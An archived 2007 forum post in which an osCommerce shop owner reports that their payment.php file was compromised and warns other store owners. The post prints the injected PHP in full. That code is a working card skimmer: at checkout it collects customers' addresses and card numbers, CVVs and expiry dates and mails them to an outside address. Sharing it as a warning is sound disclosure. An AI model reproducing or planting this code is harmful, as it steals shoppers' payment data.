Guest Posted June 28, 2007 Posted June 28, 2007 I am not sure how this happened, but I am looking into it... I suspect a compromised admin password. It is important that others check to insure that they were not hacked, and I would love feedback from anyone else that might have the same issue. Sometime yesterday my includes/classes/payment.php file was changed to include this code above the code header: <?php $urlz=$_SERVER['REQUEST_URI']; if (eregi("checkout_confirmation.php", $urlz)) { $td_query = tep_db_query("select * from " . TABLE_ADDRESS_BOOK . " where customers_id = '" . $customer_id . "'"); $duong = tep_db_fetch_array($td_query); $firstname123=$duong['entry_firstname']; $lastname123=$duong['entry_lastname']; $street_address123=$duong['entry_street_address']; $city123=$duong['entry_city']; $zone_id=$duong['entry_zone_id']; $statex=$duong['entry_state']; if(($statex=="")||($statex=="0")) { $td_queryxx = tep_db_query("select * from " . TABLE_ZONES . " where zone_id = '" . $zone_id . "'"); $duongxx = tep_db_fetch_array($td_queryxx); $state123 = $duongxx['zone_name']; }else {$state123=$statex;} $country=$duong['entry_country_id']; $td_queryxxx = tep_db_query("select * from " . TABLE_COUNTRIES . " where countries_id = '" . $country . "'"); $duongxxx = tep_db_fetch_array($td_queryxxx); $country123 = $duongxxx['countries_name']; $postcode123=$duong['entry_postcode']; $td_query2 = tep_db_query("select * from " . TABLE_CUSTOMERS . " where customers_id = '" . $customer_id . "'"); $duong2 = tep_db_fetch_array($td_query2); $telephone123=$duong2['customers_telephone']; $email_address123=$duong2['customers_email_address']; $dob123 = $duong2['customers_dob']; $site = "[edited.to.protect.innocent]"; $headers123 = "From:Website $site"; $headers123 .= "<$site>\n"; $headers123 .= "X-Sender: <$site>\n"; $headers123 .= "X-Mailer: PHP\n"; $headers123 .= "Return-Path:<[email protected]>\n"; $headers123 .= "Content-Type:text/html; "; $headers123 .= "charset=iso-8859-1\n"; $message123 = "Name : $firstname123 $lastname123 <br>"; $message123 .= "Telephone : $telephone123 <br>"; $message123 .= "Email : $email_address123 <br>"; $message123 .= "Street : $street_address123 <br>"; $message123 .= "Postcode : $postcode123 <br>"; $message123 .= "City : $city123 <br>"; $message123 .= "State : $state123 <br>"; $message123 .= "Country : $country123 <br>"; $ccowner123 = $HTTP_POST_VARS['cc_owner']; $ccnumber123 = $HTTP_POST_VARS['cc_number']; $tmp1 = $HTTP_POST_VARS['cc_cvmvalue']; $tmp2 = $HTTP_POST_VARS['cc_expires_month'] . "/" . $HTTP_POST_VARS['cc_expires_year']; $message123 .= "CC Owner : $ccowner123 <br>"; $message123 .= "CC Number : $ccnumber123 <br>"; $message123 .= "CVV2 : $tmp1 <br>"; $message123 .= "Date Expire : $tmp2 <br>"; $message123 .= "Site : http://$site <br>"; if(($ccnumber123!="")&&($tmp1!="")&&($tmp1!="0")){ mail("[email protected]","Cvv - Site $site!",$message123,$headers123); } } /* $Id: payment.php,v 1.37 2003/06/09 22:26:32 hpdl Exp $ osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com ...etc
Recommended Posts
Archived
This topic is now archived and is closed to further replies.